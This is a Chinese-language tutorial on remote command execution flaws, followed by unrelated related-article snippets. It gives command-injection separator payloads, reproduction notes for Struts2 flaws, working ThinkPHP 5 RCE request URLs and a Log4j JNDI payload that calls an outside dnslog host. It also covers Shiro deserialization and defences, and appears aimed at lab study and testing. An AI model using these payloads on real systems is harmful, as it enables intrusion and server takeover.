命令执行(rce)

1.命令与代码执行原理

  • 命令执行原理

        参数给变量未经过滤,直接使用了不安全的函数处理了变量
            

127.0.0.1&&ipconfig   有漏洞

  • 常用的函数

            assert,system,exec,shell_exec, eval,``(反单引号)

  •     代码执行原理

        参数给变量未经过滤,直接使用了不安全的函数处理了变量,使用了eval函数
   可以执行代码

2.如何挖命令执行漏洞

(1)执行系统命令: assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,``(反单引号)
(2)代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
(3)文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
(4).htaccess: SetHandler, auto_prepend_file, auto_append_file 

3.命令执行一般出现那些地方

只要带参数的地方都可能出现命令执行漏洞
常见的路由器、防火墙、入侵检测、自动化运维平台 

4.测试方法(绕过方法)

  •  &&


            127.0.0.1&&ipconfig

 ​​​

  •     &

 过滤了&&可以使用&

127.0.0.1&ipconfig

  •     |

 127.0.0.1|ipconfig  后面的被执行

  •  || 

5.框架介绍

  • struts2框架

    1.怎么识别
        扩展名为.action和.do
        payload          apache.struts2
    2.使用的工具

对比工具的区别采用抓包放包的wse抓包
                        

2.struts2命令执行漏洞
s2-005、s2-009、s2-013、s2-016、s2-019、devmode、s2-032、s2-037、s2-045、s2-048、s2-052、s2-057

  • s2-045复现  

 dir /s c:\\*.jsp   查看文件路径/s是递归
                            

  • s2-046复现

   添加用户

 可以开3389远程连接

  •  s2-048复现

http://10.0.0.139:8090/struts2-showcase/integration/saveGangster.action

  • s2-058复现 

 <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />添加

 删掉这里

 把type="chain"改成type="redirectAction"

   http://10.0.0.139:8090/struts2-showcase/actionChain1.action  这个页面有漏洞

  • thinkphp5.0.22框架

  • 框架的搭建

        修改文件,在thinkphp目录搜索database.php文件配置数据库连接


        PHP5.4以上版本

  •     怎样知道对方的框架是thinkphp以及版本号

        http://10.0.0.139:92/thinkphp/public/index.php  拼接错误的

    http://10.0.0.139:92/thinkphp/public/index.php
     打开图标为一个笑脸就是thinkphp

     

  •     检测框架是否有漏洞

        使用bp里面的工具

读取文件

http://10.0.0.139:92/thinkphp//runtime/log/202309/20.log   日志信息泄露

 http://10.0.0.139:92/thinkphp/public//s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

http://10.0.0.139:92/thinkphp/public//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1 

  • apache log4j

    Apache Log4j是一个开放源码的Java日志记录库,主要可以帮助开发人员更轻松地控制日志级别,构建记录器,以及在多种日志目标之间转换,而无需修改日志消息。

  • 原理

由于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。

  •     漏洞影响版本

        Apache Log4j 2.x <= 2.14.1

  •     攻击代码

        ${jndi:ldap://${sys:java.version}.iswaen.dnslog.cn}  后面需要换    

  •     怎么挖漏洞

        在输入的地方登录的地方插入payload             ${jndi:ldap://${sys:java.version}.iswaen.dnslog.cn}

  •     修复方案

       1. 升级到java8以上
        2.中间件按官网升级  ,升级了会自动移除对lookup功能的支持,默认就会禁用jndi的方法,移除log4j包中的jndilookup类 

  • apache   shiro(反序列化)

  •     搭建

        cat /etc/apt/sources.list


            apt-get update 
            apt-get install docker
            apt-get install docker-compose
            docker run -d -p 80:8080  medicean/vulapps:s_shiro_1
            http://10.0.0.131/

 webshell工具

  •  介绍

        Apache Shiro是一个功能强大且易于使用的 Java 安全框架,主要包含身份验证、授权、加密和会话管理等功能,可用于保护任何应用程序。

  • 原理

        shiro  550
         提供了记住我的功能(rememberme),用户登录成功后会生成经过加密并编码的cookie,在服务端接收cookie值后进行base64解码->ASE解码->反序列化。攻击者只要找到ase加密的密钥,就可以构造一个恶意对象,对其进行序列化->ASE加密->base64编码,然后将其作为cookie的rememberme字段发送,shirp将rememberme进行解密并且反序列化,最终造成反序列化漏洞
        shirp  721
       由于apache  siro cookie  中通过ase-128-cbc模式加密的rememberme字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行

  •     受影响版本区别

        shiro  550      apache   shiro  <  1.2.4   ase加密的密钥泄露,造成了这个漏洞
        shiro  721      apache   shiro  <  1.4.2    rememberme字段出现问题

  •     怎么判断apache  shiro 框架

        burp抓包有  rememberme    和   deleteme

  •     攻击工具

        shiroattack    ,   shiroexp

  •     修复方案

        升级shiro至最新版本1.7.1
        保持shiro版本不变,修改rememberme默认密钥
        禁用rememberme 默认密钥 

6.防御

1. 配置好php相关参数
通过Php配置文件里面有个disable_functions = 配置,禁止某些php函数,
例如:disable_functions =system,passthru,shell_exec,exec,popen
便禁止了用这些函数来执行系统命令
2.升级中间件
3.参数给变量严格过滤,把参数写死。如果填入ip地址,以点作为切割判断是不是四段 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/141331.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于微信小程序的健身房私教预约平台设计与实现(源码+lw+部署文档+讲解等)

文章目录 前言系统主要功能&#xff1a;具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序&#xff08;小蔡coding&#xff09;有保障的售后福利 代码参考源码获取 前言 &#x1f497;博主介绍&#xff1a;✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计…

阿里云服务器使用教程(从购买到配置再到搭建自己的网站)

阿里云服务器使用教程包括云服务器购买、云服务器配置选择、云服务器开通端口号、搭建网站所需Web环境、安装网站程序、域名解析到云服务器公网IP地址&#xff0c;最后网站上线全流程&#xff0c;阿小云分享阿里云服务器详细使用教程&#xff1a; 目录 阿里云服务器使用教程 …

PostgreSQL如何支持PL/Python过程语言

瀚高数据库 目录 环境 文档用途 详细信息 环境 系统平台&#xff1a;Linux x86-64 Red Hat Enterprise Linux 7 版本&#xff1a;10.4 文档用途 本文档主要介绍PostgreSQL如何支持PL/Python过程语言&#xff0c;如何创建plpython扩展。 详细信息 一、PostgreSQL支持python语言…

215 数组中的第K个最大元素

满足时间复杂度o(n)的方法&#xff1a; 快排的思想 class Solution{ public:int findKthLargest(vector<int>& nums,int k){return quickSelect(nums,k);} private:int quickSelect(vector<int>& nums,int k){//随机选择基数int privotnums[rand()%nums…

Quartz 体系结构

Quartz的体系结构 Quartz的重要组件 Scheduler 用于与调度程序交互的主程序接口。 Scheduler调度程序-任务执行计划表&#xff0c;只有安排进执行计划的任务Job&#xff08;通过scheduler.scheduleJob方法安排进执行计划&#xff09;&#xff0c;当它预先定义的执行时间到了的时…

华为云云耀云服务器L实例评测|如何保障华为云云耀云服务器L实例的安全和性能

引言 云耀云服务器L实例是华为云提供的高性能计算实例&#xff0c;为用户提供稳定可靠的云计算环境。为了保障实例的安全和性能&#xff0c;用户可以通过设置防火墙和安全组策略来限制网络访问和防止恶意攻击。华为云提供了灵活的管理工具&#xff0c;用户可以通过控制台、API…

tomcat启动,测试被拒绝连接

tomcat镜像下载下来后&#xff0c;启动容器&#xff0c;测试连接被拒绝。也闪退。 报错信息如下&#xff1a; curl: (7) Failed connect to localhost:8888; 拒绝连接解决方式&#xff1a; # 启动时给root实际权限&#xff0c;即可成功连接 docker run -d -p 8888:8080 --pri…

基于微信小程序的线上教育课程付费商城(源码+lw+部署文档+讲解等)

文章目录 前言具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序&#xff08;小蔡coding&#xff09;有保障的售后福利 代码参考源码获取 前言 &#x1f497;博主介绍&#xff1a;✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作…

SpringMVC 学习(一)Servlet

1. Hello Servlet (1) 创建父工程 删除src文件夹 引入一些基本的依赖 <!--依赖--> <dependencies><dependency><groupId>junit</groupId><artifactId>junit</artifactId><version>4.12</version><scope>test<…

【洛谷 P1644】跳马问题 题解(动态规划)

跳马问题 题目背景 在爱与愁的故事第一弹第三章出来前先练练四道基本的回溯/搜索题吧…… 题目描述 中国象棋半张棋盘如图 1 1 1 所示。马自左下角 ( 0 , 0 ) (0,0) (0,0) 向右上角 ( m , n ) (m,n) (m,n) 跳。规定只能往右跳&#xff0c;不准往左跳。比如图 1 1 1 中所…

Spring Cloud Alibaba Gateway 简单使用

文章目录 Spring Cloud Alibaba Gateway1.Gateway简介2. 流量网关和服务网关的区别3. Spring Cloud Gateway 网关的搭建3.1 Spring Cloud Gateway 配置项的说明3.2 依赖导入3.3 配置文件 Spring Cloud Alibaba Gateway 1.Gateway简介 Spring Cloud Gateway是一个基于Spring F…

变量和配置文件

文章目录 变量和配置文件1. 变量1.1 系统变量1.1.1 系统变量分类1.1.2 查看系统变量1.1.3 修改系统变量的值 1.2 用户变量1.2.1 用户变量分类1.2.2 会话用户变量1.2.3 局部变量1.2.4 会话用户变量月局部变量对比 2. 配置文件的使用2.1 配置文件格式2.2 启动命令与选项组2.3 特定…

安卓逆向 - EdXposed LSPosed VirtualXposed

一、引言 接上篇&#xff1a;安卓逆向 - Xposed入门教程_小馒头yy的博客-CSDN博客 我们介绍了Xposed入门安装使用&#xff0c;但是只支持到Android 8&#xff0c;并且安装模块需要重启。今天我们来看看Xposed的其他版本。 二、各种Xposed框架对比 1、Xposed 只支持到安卓8&…

Linux基础指令(五)

目录 前言1. 打包和压缩1.1 是什么1.2 为什么1.3 怎么办&#xff1f; 2. zip & unzip3. tar 指令结语&#xff1a; 前言 欢迎各位伙伴来到学习 Linux 指令的 第五天&#xff01;&#xff01;&#xff01; 在上一篇文章 Linux基本指令(四) 当中&#xff0c;我们学习了 fin…

软考高级架构师下篇-17安全架构设计理论与实践

目录 1. 引言信息安全面临的威胁2. 安全体系架构的范围3.典型安全模型4.信息安全整体架构设计5.数据库系统安全设计6.系统架构脆弱性分析7.安全架构设计实践8. 前文回顾1. 引言 随着科技的发展,信息系统的安全受到诸多方面的威胁,设计信息系统安全架构需要从各个方面考虑,这…

C++核心编程

本阶段主要针对C面向对象编程技术做详细讲解&#xff0c;探讨C中的核心和精髓。 1 内存分区模型 C程序在执行时&#xff0c;将内存大方向划分为4个区域 代码区&#xff1a;存放函数体的二进制代码&#xff0c;由操作系统进行管理的 全局区&#xff1a;存放全局变量和静态变量…

总结 HTTP 协议的基本格式和 fiddler 的用法

HTTP基本格式 HTTP协议也是日常开发中非常常用的的一种协议&#xff0c;在众多协议栈里HTTP可能是实际开发中用的最多的。 注意 这里说的HTTP是指HTTP1以及HTTP2&#xff0c;他们都是基于TCP协议的&#xff0c;注意&#xff1a;如今最新版的HTTP3是基于UDP的。 但如今在互联网…

SQL server 创建存储过程

SQL Server如何创建存储过程 存储过程&#xff1a; 可以理解为完成特定功能的一组 SQL 语句集&#xff0c;存储在数据库中&#xff0c;经过第一次编译&#xff0c;之后的运行不需要再次编译&#xff0c;用户通过指定存储过程的名字并给出参数&#xff08;如果该存储过程带有参数…

常用数据库validationQuery语句

常用数据库validationQuery语句 validationQuery是用来验证数据库连接的查询语句&#xff0c;这个查询语句必须是至少返回一条数据的SELECT语句。每种数据库都有各自的验证语句&#xff0c; 下表中收集了几种常见数据库的validationQuery。DataBase validationQueryhsqldb …

Linus Torvalds接受来自微软的Linux Hyper-V升级

微软最近推送了一些变更&#xff0c;旨在改进即将发布的 Linux 内核 6.6 版本对 Hyper-V 的支持。这些改进包括在 Hyper-V 上支持 AMD SEV-SNP guest 和 Intel TDX guest。除了这两项&#xff0c;还有其他一些升级&#xff0c;如改进了 VMBus 驱动程序中的 ACPI&#xff08;高级…